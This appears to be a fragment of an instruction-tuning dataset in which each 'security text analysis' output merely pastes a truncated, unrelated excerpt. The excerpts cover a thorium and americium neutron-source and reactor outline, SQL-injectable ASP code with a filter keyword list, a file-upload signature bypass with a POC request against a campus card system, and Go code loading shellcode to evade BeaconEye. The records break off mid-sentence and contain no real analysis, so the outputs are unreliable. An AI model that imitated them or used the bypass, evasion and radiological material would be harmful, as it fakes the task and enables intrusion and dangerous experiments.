URANIUM-235,233,PLUTONIUM-239,240  THORIUM-232 BECOMES 233 + NEUTRON  LANTERN MANTELS CONTAIN THORIUM  COPIOUS AMOUNT OF MANTELS THE NEUTRON GUN  A DEVICE TO TRANSFORM ELEMENTS  ALPHA PARTICLES FIRED AT ALUMINUM OR BERYLLIUM PRODUCE NEUTRONS  AMERICIUM 241 FOUND IN SMOKE DETECTORS PRODUCES ALPHA PARTICLES  NEED AT LEAST 100 DETECTORS NEUTRON GUN 2  RADIUM- USED AS A PAINT ON CLOCK FACES REACTOR START UP  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAsp 安全审计 http://hi.baidu.com/micropoor 1 ASP ASP ASP ASP 代码安全审计 ------PHP ------PHP ------PHP ------PHP 安全新闻早 8888 点特别篇 2012/3/20 注入漏洞 1.Request.QueryString获取地址栏参数(以及以 GET 方式提交的数据) 如Request.QueryString(\"id\") 2.Request.Form 获取以 POST 方式提交的数据(接收 Form 提交来的数据) 如Request.Form(\"id\") 3.Request.Cookies: 获取浏览器 Cookier 信息 4.Request包含以上三种方式(优先获取 GET 方式提交的数据)它会在 QueryStringForm ServerVariable 中都搜寻一遍而且有时候也会得到不同的结果 如Request(\"id\") 例示代码 <% ////////数字型 Response.Expires=0 dim sql dim rs articleid=request(\"film2\") urlid=request(\"film1\") if articleid=\"\" or urlid=\"\" then response.write\"非法操作\" response.end end if set rs=server.createobject(\"adodb.recordset\") sql=\"select serverip,canlook,movietype,title from learning where articleid=\"&articleid rs.open sql,conn,1,1 serverip=rs(\"serverip\") okip=Request.Servervariables(\"HTTP_X_FORWARDED_FOR\") If okip=\"\" Then okip=Request.Servervariables(\"REMOTE_ADDR\") set rst8=server.createobject(\"adodb.recordset\") sql=\"select okip,testok,endtimes from okip where okip='\"&okip&\"'\" rst8.open sql,conn,1,1 if rst8.eof and rst8.bof then if request.cookies(\"userid\")=\"\" or request.cookies(\"password\")=\"\" then %> <% ////////字符型 if request(\"username\")<>\"\" then set rst=server.createobject(\"adodb.recordset\") Asp 安全审计 http://hi.baidu.com/micropoor 2 sql=\"select user from users where username='\"&request(\"username\")&\"' and password='\"&md5(request(\"pws\"))&\"'\" //注意两者的 sql rst.open sql,conn,1,3 %> <% //Cookies //Cookies //Cookies //Cookies 注入 'SQL 通用防注入程序 'Aseanleung '--------定义部份------------------ Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr Dim fso1,all_tree2,file1,files,filez,fs1,zruserip If Request.QueryString<>\"\" Then (对 Request.QueryString 提交(客户采用 GET 方式提交)的数 据进行判断,并没有指明对其它方式提交的数据进行判断) '自定义需要过滤的字串,用 \"|\" 分隔 Fy_In = \"'|;|%|*|and|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare|script\" ( 阻止 了常用的 SQL 注入的语句) Fy_Inf = split(Fy_In,\"|\") For Each Fy_Get In Request.QueryString For Fy_Xh=0 To Ubound(Fy_Inf) If Instr(LCase(Request.QueryString(Fy_Get", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Rock with the wired shark! (Misc, 70p) Sniffing traffic is fun. I saw a wired shark. Isn't that strange? ###ENG [PL](#pl-version) After extracting objects from given pcap file, we get only a couple of webpages and a zip file. It was encrypted, but we found the password in HTTP basic authorization. ###PL version Wypakowawszy obiekty z otrzymanego pliku pcap, dostaliśmy jedynie kilka stron oraz zaszyfrowanego zipa. Hasło, po chwili szukania, można było znaleźć w autoryzacji żądania HTTP w oryginalnym pliku.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一次完整的代码审计 前言: 因为本人一直活跃于教育 SRC,所以本次针对的系统也是各大高校所使用的 系统 系统名称: 某一卡通门户系统 正文: 0x01: NET 平台下的源码挖掘 个人非常喜欢针对于.NET 和 JAVA 平台所开发的程序做测试相反对 于 php 就是一窍不通了 在针对 NET 平台,因为大部分使用的都是 IIS 中间件,对大小写不敏感, 所以在生成字典的时候也会方便很多 由于 NET 平台的特性,大部分程序的源代码都会打包成程序集存储在根 目录下的 bin 目录这导致了部分运维喜欢备份 bin 目录且将备份过后的 文件存储于网站根目录下,若黑客使用事先准备好的字典,就可以轻而易举 的获取到源代码 示例: 使用御剑批量扫描资产 得到的数据还是挺可观的,下载过后的文件可以直接使用 dnSpy 进行逆向查看 源代码 0x02:.NET 代码审计之- 文件上传 在某个站点下获取到新中新一卡通的 bin 目录使用 dnSpy 进行了逆向 初步分析了两个文件,WebController 为主页的控制器ManagerController 为管理页的控制器 两个页面的路由规则如下: WebController: 控制器名/方法名 ManagerController: Manager/控制器名/方法名 一般的 Manager 控制器下面的都会有登录过滤,可以后面再看 这里先看 WebController 下面的功能 有很多控制器,看命名方式,还是能确定不少功能的 其实,在开始审计前,我都喜欢看一下 Filter 过滤器里面的功能 在过滤器中有一个 SqlFitler 大概功能就是捕捉 get 和 post 请求里面的敏感参数比如 单引号 就会直接拦截那么就没有必要去挖 SQL 了虽然这里也可以绕过但 是 SQL 注入太麻烦了一般都喜欢放到最后再挖 期 间 在 NoBaseController 控 制 器 下 面 发 现 了 一 处 文 件 上 传 操,upshallfile 方法中定义了一处文件上传功能具体展现在第 59 行进行 了文件存储操作期间并未进行任何文件类型效验操作 流程分析: 方法中第 567 行代码声明了三个字符类型的变量该变量的值从 http 请求头的属性获取 text 变量获取请求头中的 path 属性默认值为 ~/ text2 变量 获取请求头中的 sign 属性 text3 变量获取请求头中的 time 属性 第 10 行-17 行判断 text2 是否为空如果为空返回签名失败 第 18 行--27 行进行了一个效验操作 时间类型变量 d 的值为 text3 变量转换成时间的内容 时间类型变量 d2 的值为 当前时间转换成 yyyyMMddHHmmssff 格式的内容 那么这里可以得知: text3 的内容是由请求头中的 time 属性决定 time 属性 传递内容必须为时间且为 yyyyMMddHHmmssff 格式 第 20 行: 如果 当前时间 减去 传递进来的时间 大于 10 则返回签名超时 这里只需要大于 10 就可以那么可以直接定义传入时间为 2099 年这样就一直 可以使用 第 28-38 行则是对文件效验码的操作 29 行中的 声明了一个 strMd 变量 其 值为 进行 md5 加密后的内容 要加密的内容如下: file.FileName (文件名称) :service.asmx text : 由 http 请求头中的 path 属性决定 text3: 由 http 请求头中的 time 属性决定 Synjones 为进行 md5 加密所附带的 salt 将以上内容加密后与 text2 变量进行对比如果不相等那么返回签名校验 失败 如果相等则进入 59 行的文件存储操作 已知 text2 变量的内容由 http 请求头中的 sign 属性决定 那么只需要将定义好的内容进行加密然后赋值给 sign就可以绕过了 这里可以直接把 InterFaceMd5Helper.GetStrMd5 这个方法拖出来到本地调用 进行加密操作 其中 第 59 行调用 text 变量 也就是说 text 为文件存储路径 那么构造加解密方法: 得到 Sign 的值 构造 POC: POST /NoBase/upshallfile HTTP/1.1 Content-Type: multipart/form-data; boundary=\"6e9cb0ae-23eb-49bf-92d6-16dcbb95bd8a\" time: 2099070800284040 sign: B041E90676E936521F2B967770314C56 path: ~/ 0x02: 任意账户登录 在 LoginController 控", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\niotop === 用来监视磁盘I/O使用状况的工具 ## 补充说明 **iotop命令** 是一个用来监视磁盘I/O使用状况的top类工具iotop具有与top相似的UI其中包括PID用户I/O进程等相关信息Linux下的IO统计工具如iostatnmon等大多数是只能统计到per设备的读写情况如果你想知道每个进程是如何使用IO的就比较麻烦使用iotop命令可以很方便的查看 iotop使用Python语言编写而成要求Python2.5及以上版本和Linux kernel2.6.20及以上版本iotop提供有源代码及rpm包可从其官方主页下载 ### 安装 **Ubuntu** ```shell apt-get install iotop ``` **CentOS** ```shell yum install iotop ``` **编译安装** ```shell wget http://guichaz.free.fr/iotop/files/iotop-0.4.4.tar.gz tar zxf iotop-0.4.4.tar.gz python setup.py build python setup.py install ``` ### 语法 ```shell iotop选项 ``` ### 选项 ```shell -o只显示有io操作的进程 -b批量显示无交互主要用作记录到文件 -n NUM显示NUM次主要用于非交互式模式 -d SEC间隔SEC秒显示一次 -p PID监控的进程pid -u USER监控的进程用户 ``` **iotop常用快捷键** 1. 左右箭头改变排序方式默认是按IO排序 2. r改变排序顺序 3. o只显示有IO输出的进程 4. p进程/线程的显示方式的切换 5. a显示累积使用量 6. q退出 ### 实例 直接执行iotop就可以看到效果了 ```shell Total DISK read: 0.00 B/s | Total DISK write: 0.00 B/s TID PRIO USER DISK READ DISK WRITE SWAPIN IO> command 1 be/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % init [3] 2 be/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [kthreadd] 3 rt/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [migration/0] 4 be/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [ksoftirqd/0] 5 rt/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [watchdog/0] 6 rt/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [migration/1] 7 be/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [ksoftirqd/1] 8 rt/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [watchdog/1] 9 be/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [events/0] 10 be/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [events/1] 11 be/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [khelper] 2572 be/4 root 0.00 B/s 0.00 B/s 0.00 % 0.00 % [bluetooth] ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEsoteric Exfiltration Willa Riggins Who Am I? Seriously, people. Does someone know? Cause I dont.  Senior Penetration Tester @ Veracode  FamiLAB Member  DC407 Point of Contact  OWASP Orlando Marketing Coordinator  BSides Orlando Social Media Lady  @willasaywhat on Twitter Exfiltration 101 What Is It? Data exfiltration is the unauthorized transfer of sensitive information from a targets network to a location which a threat actor controls., Trend Micro Why Should You Care?  Data loss costs time, money, and your sanity.  Ever found a credential dump on pastebin?  Come on, are we still reading the slides?  If you didnt care you wouldnt be here. 82% Of those surveyed in 2012 from /r/netsec said that preventing exfiltration was important to the security of their information systems Covert Channels & Where to Find Them  Mask traffic with normal usage patterns  Social media  Web traffic  Protocols used for day to day business  Hide data in known safe payloads  Status updates  HTTP POST Payloads  Stay quiet, within normal payload sizes  Throttle exfil chunks  Set payload sizes based on the channel used  Encode and/or encrypt chunks Esoteric Exfiltration Transport: Change the Channel  Network Protocols  3rd Party Drops  To the Airwaves Network Protocols: Data on the Wire  The Obvious  HTTP  SSH  Netcat  DNS?  The Discreet  Using normal protocols in abnormal ways 3rd Party Drops: Hide Yo Data  The Obvious  Dropbox  OneDrive  Google Drive  Pastebin  The Discreet  Flickr  Imgur  Twitter  Facebook To the Airwaves: Breaking Layer One  The Obvious  Wifi Adapter on a Raspberry Pi  The Discreet  Xbee 900mhz Long Range Mesh Network  Over Ham Radio (APRS) w/ Repeaters  Lasers, just, lasers Blue Team Says What? Defenses & Detection  Block endpoints by URI/IP  Block egress at the firewall by port/proto  Detect anomalies in payload size and frequency  Block USB devices by class or device-id (USB serial) Offensive Maneuvers  Blacklists dont work  Disrupts normal business  Context is critic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDemystifying Key Stretching and PAKEs Steve Sc00bz Thomas 2 Who am I? Why am I here? 3 Who am I? Why am I here?  Password cracker  Cryptography enthusiast  I just wanted a pw manager  Bugs and vulns galore  How would I make one?  PHC Panelist  I broke Schvrch and old Makwa 4  Key Stretching  What?  Why?  Types  What goes wrong?  How?  Settings Agenda  Password Authenticated Key Exchange (PAKE)  What?  Why?  Types  How?  Properties 5 Key Stretching  Passwords  Hashing (Authentication)  KDF (Key Derivation Function)  Fingerprints  Signals Safety Numbers (299.7  2112) 6 Key Stretching  Why?  Ashley Madison data breach (2015)  36.15 million bcrypt cost 12 hashes  113 H/s/GPU (GTX 980 Ti, the best at the time)  89 GPU-hours/password 7 Key Stretching  Why?  Ashley Madison data breach (2015)  36.15 million bcrypt cost 12 hashes  113 H/s/GPU (GTX 980 Ti, the best at the time)  89 GPU-hours/password  15.26 million salted, case-insensitive MD5 hashes[1]  11.2 million bcrypt cracked in 10 days  73% with MD5 hashes 8 Key Stretching  Types  Computationally hard  Amount of work done (number of blocks hashed)  Parallel vs Sequential  Memory hard  Amount of memory used  Bandwidth consumed  Cache hard  Random small transactions 9 Key Stretching  Types  Computationally hard  Parallel PBKDF2  PBKDF2  Memory hard  Argon2  Balloon Hashing  scrypt  Cache hard  bcrypt  bscrypt 10 Key Stretching  How? 1) seed = H(inputs) a) [optional] independent seed = H(non-secret inputs) 2) work = doWork(settings, seed[, independent seed]) 3) key = KDF(output size, work, seed or inputs) 11 Key Stretching Bugs  md5crypt (CVE-2012-3287)  PBKDF2 (CVE-2013-1443)  phpass (CVE-2014-9034)  shacrypt (CVE-2016-20013)  bcrypt's $2$, $2a$$2b$, $2x$, truncation, and null characters 12 Key Stretching Bugs  bcrypt silently truncates at 72 bytes $passhash = password_hash( phash('P3rv4d3_extrasalt') . $fields['password'] . phash('S0ftw4r3_extrapepper'), PASSWORD_BCRYPT); Note phash() is SHA-256 hex output Source: https", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSo You Got Arrested at DefCon... Thursday, July 30 DefCon 17 Jim Rennie Disclaimer This is not legal advice. The presenter is not your lawyer (yet). This talk is not a substitute for legal advice. This is for edutainment purposes only. If you really get arrested, consult your attorney. Crimes you might commit @ DefCon Drugs Prostitutes Hacking Burglary Cheating on Gambling DUI Disorderly Conduct, Etc Drug Crimes Possession of Dangerous Drug Possession of Marijuana Possession of Drug w/o Prescription Possession of a Controlled Substance Possession with Intent to Sell Trafficking Controlled Substance Less Serious More Serious Prostitutes Prostitution is ILLEGAL in Las Vegas Soliciting Prostitution vs. Pandering Trick Roll Hacking/Computer Crimes (aka crimes you won't be charged with) Illegal Use of a System Unlawful Use of Encryption Unlawful Use or Access of a Computer, etc. Burglary A person who, by day or night, enters any house, room, apartment, tenement, shop, warehouse, store, mill, barn, stable, outhouse or other building, tent, vessel, vehicle, vehicle trailer, semitrailer or house trailer, airplane, glider, boat or railroad car, with the intent to commit grand or petit larceny, assault or battery on any person or any felony, or to obtain money or property by false pretenses, is guilty of burglary. - NRS 205.060 Cheating on Gambling Communicating odds/cards to other players Placing a bet after result is known Taking back a bet after result is known DUI Legal Limit = 0.08 Implied Consent If You Think You're Drunk, Ask for Blood! 3 Strikes  3 DUI within 7 years = PRISON* (* - ok, there are exceptions, but don't count on them) Disorderly Conduct, Etc Disorderly Conduct Fake ID vs. Forged ID Oops, Arrested! What Happens When you are Arrested Miranda Invoke your right to silence Explicitly ask for an attorney If < 18 = explicitly ask for your parents Citation or Go to Jail Where you go when you are Arrested Clark County Detention Center 330 S. Casino Center Bouleva", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeaconEye绕过小记 应L.N.大佬的邀请写一下绕过的复现过程 最近C2开发群内都在讨论关于cs绕过内存检测的话题 在今天下午首先是看到了这样一个绕过手段 希望大佬能讲讲原因 虽然我也不知道啥意思总之感觉很厉害就去复现了 刚好最近在整理关于golang调用api的东西 具体golang调用的代码如下 SymInitialize api如果执行成功会返回为true 加入这一段后就还是常规的alloc -> write -> execute加载stageless shellcode. 然后上线了 Dbghelp = syscall.NewLazyDLL(\"Dbghelp.dll\") SymInitialize := Dbghelp.NewProc(\"SymInitialize\") r1,r2,err := SymInitialize.Call( pHndl, 0, 1, ) fmt.Println(r1) fmt.Println(r2) fmt.Println(err) if r1 != 1 { fmt.Println(\"SymInitialize failed: \", syscall.GetLastError()) } 绕过了 惊呆了", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDavid Meléndez Cano David Meléndez Cano R&D Embedded Systems Engineer @taiksontexas Taiksonprojects.blogspot.com Project The Interceptor: Owning anti-drone systems with nanodrones David Meléndez Cano @TaiksonTexas  R&D Embedded Software Engineer in Albalá Ingenieros, S.A. Spain  Author of the robots: \"Atropos\" & \"Texas Ranger\"  Author of the Book \"Hacking con Drones\"  \"Reincident\" speaker  Trainiac David Meléndez Cano @TaiksonTexas  R&D Embedded Software Engineer in Albalá Ingenieros, S.A. Spain  Author of the robots: \"Atropos\" & \"Texas Ranger\"  Author of the Book \"Hacking con Drones\"  \"Reincident\" speaker  Trainiac David Meléndez Cano @TaiksonTexas  R&D Embedded Software Engineer in Albalá Ingenieros, S.A. Spain  Author of the robots: \"Atropos\" & \"Texas Ranger\"  Author of the Book \"Hacking con Drones\"  \"Reincident\" speaker  Trainiac David Meléndez Cano @TaiksonTexas  R&D Embedded Software Engineer in Albalá Ingenieros, S.A. Spain  Author of the robots: \"Atropos\" & \"Texas Ranger\"  Author of the Book \"Hacking con Drones\"  \"Reincident\" speaker  Trainiac @taiksontexas @taiksontexas Previously in DEFCON... @taiksontexas Previously in DEFCON... @taiksontexas Drones as a threat  Flying computers. (IoT over your head.)  Custom payloads:  Sniffers  Jammers  Network Analyzers  3d mapping, cameras.  Physical attacks, explosives.  ... @taiksontexas Detection  Thermal and standard cameras  A.I. to detect drone shape  Electronics and motor heat detection  Characterization of drone noise  Detected Radio Frequency and waveform  Radio signature @taiksontexas Voluntary measures  No-fly zone controlled by onboard GPS and Autopilots  Real time telemetry transmission to COPS  Give to COPS the ability to take down your drone and everything will be alright @taiksontexas Counter-Countermeasures  Spread-spectrum  Frequency hopping  Use unespected frequencies by the jammer  Robust protocols @taiksontexas First Round: ATROPOS Dron ATROPOS  WiFi Router  PIC16F876 for PWM  Wii Nunckuck and Mot", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 文件头 --- 文件的扩展名是用来识别文件类型的通过给他指定扩展名我们可以告诉自己也告诉操作系统我们想用什么方式打开这个文件比如我么会把 .jpg 的文件默认用图片显示软件打开.zip 文件会默认用解压软件打开等等 然而扩展名完全是可以随便改改的我们可以给文件设置一个任意的扩展名当然也可以不设置扩展名这样一来我们就不能了解到这个文件究竟是做什么的究竟是个什么样的文件我们或许也会疑惑为什么一个软件比如视频播放器就能用正确的方式打开.mp4 .rmvb .wmv 等等的视频 事实上所有的文件都是以二进制的形式进行存储的本质上没有差别之所以使用的方法不同只是因为我们理解他的方式不同在每一个文件包括图片视频或其他的非 ASCII 文件的开头十六进制表示实际上都有一片区域来显示这个文件的实际用法这就是文件头标志 Linux 下我们可以用 file 命令直接查看文件的实际格式但是他本质上也是利用文件头标志来进行文件类型判断的 --- - [Just Solve the File Format Problem](http://fileformats.archiveteam.org/wiki/Main_Page) - [文件头一览](./文件头.xlsx) --- > 每次都要开 excel 搜,有时候还搜不出来,干脆直接 Ctrl+cv 复制到这边搜吧 - NTDS.dit AC 74 F4 04 EF CD AB 89 - system 72 65 67 66 - 123 00 00 1A 00 05 10 04 - 3gg; 3gp; 3g2 00 00 00 nn 66 74 79 70 33 67 70 - 7z 37 7A BC AF 27 1C - aba 00 01 42 41 - abi 41 4F 4C 49 4E 44 45 58 - aby; idx 41 4F 4C 44 42 - accdb 00 01 00 00 53 74 61 6E 64 61 72 64 20 41 43 45 20 44 42 - ACM 4D 5A - ADF 44 4F 53 - adx 03 00 00 00 41 50 50 52 - AIFF 46 4F 52 4D 00 - ain 21 12 - ami 5B 76 65 72 5D - amr 23 21 41 4D 52 - ANI 52 49 46 46 - API 4D 5A 90 00 03 00 00 00 - arc 1A 0x - arc 41 72 43 01 - arj 60 EA - ARJ 60 EA 27 - ART 4A 47 03 0E 00 00 00 - ART 4A 47 04 0E 00 00 00 - asf 30 26 B2 75 8E 66 CF 11 - asf; wma; wmv 30 26 B2 75 8E 66 CF 11 A6 D9 00 AA 00 62 CE 6C - asx 3C - au 2E 73 6E 64 - avi 41 56 49 20 - AX 4D 5A - AX 4D 5A 90 00 03 00 00 00 - bag 41 4F 4C 20 46 65 65 64 62 61 67 - BAS 20 20 20 - bin 42 4C 49 32 32 33 51 - bmp 42 4D - BMP 42 4D 3E - bz; bz2 42 5A 68 - BZ2; TAR.BZ2; TBZ2; TB2 42 5A 68 - CAB 49 53 63 - CAB; HDR 49 53 63 28 - CAB 4D 53 43 46 - cat 30 - CBD 43 42 46 49 4C 45 - CCD 5B 43 6C - CDR 45 4C 49 54 45 20 43 6F 6D 6D 61 6E 64 65 72 20 - CDR, DVF 4D 53 5F 56 4F 49 43 45 - CHI; CHM 49 54 53 46 - CHM 49 54 53 - CLB 43 4D 58 31 - CLB 43 4F 4D 2B - cnt 3A 42 61 73 65 - COM, DLL, DRV, EXE, PIF, QTS, QTX, SYS 4D 5A - COM 4D 5A EE - COM E9 3B 03 - CPE 46 41 58 43 4F 56 45 52 2D 56 45 52 - CPL 4D 5A - CPT 43 50 54 37 46 49 4C 45 - CPT 43 50 54 46 49 4C 45 - CPX 5B 57 69 - ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1992 Drew Eckhardt (drew@cs.colorado.edu), March 28, 1992 .\\\" .\\\" Permission is granted to make and distribute verbatim copies of this .\\\" manual provided the copyright notice and this permission notice are .\\\" preserved on all copies. .\\\" .\\\" Permission is granted to copy and distribute modified versions of this .\\\" manual under the conditions for verbatim copying, provided that the .\\\" entire resulting derived work is distributed under the terms of a .\\\" permission notice identical to this one .\\\" .\\\" Since the Linux kernel and libraries are constantly changing, this .\\\" manual page may be incorrect or out-of-date. The author(s) assume no .\\\" responsibility for errors or omissions, or for damages resulting from .\\\" the use of the information contained herein. The author(s) may not .\\\" have taken the same level of care in the production of this manual, .\\\" which is licensed free of charge, as they might when working .\\\" professionally. .\\\" .\\\" Formatted or processed versions of this manual, if unaccompanied by .\\\" the source, must acknowledge the copyright and authors of this work. .\\\" .\\\" Modified by Michael Haardt <u31b3hs@pool.informatik.rwth-aachen.de> .\\\" Modified Wed Jul 21 22:47:01 1993 by Rik Faith <faith@cs.unc.edu> .\\\" Modified 21 Aug 1994 by Michael Chastain <mec@shell.portal.com>: .\\\" Fixed typoes. .\\\" Modified Fri Jan 31 16:24:28 1997 by Eric S. Raymond <esr@thyrsus.com> .\\\" .TH EXECVE 2 \"3 September 1997\" \"Linux 2.0.30\" \"Linux Programmer's Manual\" .SH NAME execve \\- 执行程序 .SH \"总览 (SYNOPSIS)\" .B #include <unistd.h> .sp .BI \"int execve (const char *\" filename \", char *const \" argv .BI \"[], char *const \" envp []); .SH \"描述 (DESCRIPTION)\" \\fBexecve()\\fP 执行 \\fIfilename\\fP 指出的 程序. \\fIfilename\\fP 必须 是 二进制可执行文件, 或者 以 \"\\fB#! \\fIinterpreter \\fR[arg]\" 行 开始的 脚本文件. 后者的 interpreter 必须是 某个 可执行文件 的 有效 路径, 这个 可执行文件 自身 不能是 脚本程序, 调用 形式 是 \"\\fBinterpreter\\fR [arg] \\fIfilename\\fR\". \\fBexecve()\\fP 调用 成功 后 不会 返回, 其 进程 的 正文(text), 数据(data), bss 和 堆栈(stack) 段 被", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2005, Independent Security Evaluators www.securityevaluators.com How Smart is Intelligent Fuzzing - or - How Stupid is Dumb Fuzzing? Charles Miller Independent Security Evaluators August 3, 2007 cmiller@securityevaluators.com  2005, Independent Security Evaluators www.securityevaluators.com Agenda  Introduction  Portable Network Graphics  libpng  Mutation vs Generation Based Fuzzing  Conclusions  2005, Independent Security Evaluators www.securityevaluators.com Introduction  Intelligent fuzzing usually gives more results - Ilja van Sprundel  Can we quantify this statement?  How important is the choice of inputs for mutation-based fuzzing?  2005, Independent Security Evaluators www.securityevaluators.com Fuzzing  Generate test cases - files, network traffic, command line arguments, environment variables, etc.  Test cases should be close to real program inputs but should contain anomalies  Test cases fed into the target application which is monitored for faults  These anomalies are meant to defy programmer assumptions and find bugs  2005, Independent Security Evaluators www.securityevaluators.com How to Get the Test Cases  Mutate existing inputs (dumb fuzzing)  Take a valid input, say a file, and make changes to it  These changes can include modifying bytes, adding strings, %ns, etc.  Easy and fast to do  Doesnt require knowledge of the program or protocol  Dependent on the existing inputs  2005, Independent Security Evaluators www.securityevaluators.com How to Get the Test Cases (Cont)  Generate inputs from protocol description (Intelligent fuzzing)  Start from RFC or documentation  Generate inputs based on documentation  For each field in the description, add an anomaly, such as a long strings, negative numbers, %ns etc  Takes a long time to create the inputs  Tedious work  Requires complete knowledge or program or protocol  Since all possible fields are fuzzed, should be more thorough  2005, Independent Security Evaluators www.securityevaluators.com PNG Specificatio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n安全圈里的小锁匠 网络尖刀成员 郭晓东 GD 家庭安全的第一道-门锁 2 门 与 锁 第一章 锁的历史 4  草绳与觿  门闩  三簧锁  叶片锁  套筒转心锁  弹子锁 锁的历史 5  草绳与觿  门闩  三簧锁  叶片锁  套筒转心锁  弹子锁 锁的历史 6  草绳与觿  门闩  三簧锁  叶片锁  套筒转心锁  弹子锁 锁的历史 7  草绳与觿  门闩  三簧锁  叶片锁  套筒转心锁  弹子锁 锁的历史 8  草绳与觿  门闩  三簧锁  叶片锁  套筒转心锁  弹子锁 锁的历史 第二章 锁的分类 10 一A级锁B级锁超B级锁 二边柱锁传统非边柱锁 1分钟 5分钟 180分钟 内边柱外边柱 锁的分类 第三章 锁的工作原理 12 锁的工作原理 13 锁的工作原理 14 锁的工作原理 第四章 常见锁具 16 常见锁具 17 常见锁具 18 常见锁具 19 常见锁具 20 常见锁具 单开面板 快开面板 21 常见锁具 22 常见锁具 23 常见锁具 第五章 锁具的挑选与维护 25 锁具的挑选与维护 26 锁具的挑选与维护 27 锁具的挑选与维护 28 锁具的挑选与维护 29 锁具的挑选与维护 30 锁具的挑选与维护 大部分锁都可以使用润滑油进 行维护 叶片锁一般使用铅粉进行维护 第六章 智能锁 32 黑你在你所想 不到的地方 智能锁 zhakuqinglong@163.com @GD学物理黑 感谢聆听", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 工具 `这里记录一些平时收集的一些工具或有趣的东西` --- ## 有趣的工具 **2048-cli** > 终端中的 2048 ```bash dnf install 2048-cli ``` **MapSCII** > 在终端显示世界地图 - https://www.ostechnix.com/mapscii-world-map-terminal/ ```bash telnet mapscii.me ``` **neofetch** > 命令行系统信息工具 - https://github.com/dylanaraps/neofetch ```bash apt-get update apt-get install -y neofetch neofetch ``` **star war** > 一段 22 分钟长的 ASCII 动画 - http://www.asciimation.co.nz/ ```bash telnet towel.blinkenlights.nl ``` **nyancat** > 终端中的 Nyancat - https://github.com/klange/nyancat ```bash git clone https://github.com/klange/nyancat.git cd nyancat make && cd src ./nyancat ``` **yes** > yes命令在命令行中输出指定的字符串直到yes进程被杀死不带任何参数输入yes命令默认的字符串就是y ``` yes hahaa yes yes | xxx.sh ``` **lolcat** > 彩色输出 - https://github.com/busyloop/lolcat ``` gem install lolcat echo \"test\" | lolcat ``` --- ## 各种shell **fish** > 一个挺好用的 shell 环境 - https://github.com/fish-shell/fish-shell ```bash apt-add-repository ppa:fish-shell/release-3 apt-get update apt-get install -y fish ``` - 更多文章 - [如何在 Linux 中安装配置和使用 Fish Shell ](https://linux.cn/article-10622-1.html) **oh-my-zsh** - https://github.com/robbyrussell/oh-my-zsh ```bash sh -c \"$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)\" ``` themes - https://github.com/robbyrussell/oh-my-zsh/wiki/themes 下载完放置在 ~/.oh-my-zsh/themes 目录目录下并在配置文件 .zshrc 中进行指定. ```bash vim ~/.zshrc ZSH_THEME=\"<指定你的主题>\" ``` **powerline-shell** > 增强美化 shell 的工具 - https://github.com/b-ryan/powerline-shell 依赖 python 环境 `pip install powerline-shell` - **fish** ```vim vim ~/.config/fish/config.fish function fish_prompt powerline-shell --shell bare $status end ``` **starship** > 轻量级反应迅速可定制的高颜值终端 ```bash curl -fsSL https://starship.rs/install.sh | bash ``` 将初始化脚本添加到您的 shell 的配置文件 ```bash # Bash echo \"eval \\\"\\$(starship init bash)\\\"\" >> ~/.bashhrc # Fish echo \"starship init fish | source\" >> ~/.config/fish/config.fish # Zsh echo \"eval \\\"\\$(starship init zsh)\\\"\" >> ~/.zshrc ``` **mosh** > 使用 UDP 传输的 Shell ```bash apt i", "category": "text_analysis", "source": "security_papers"}
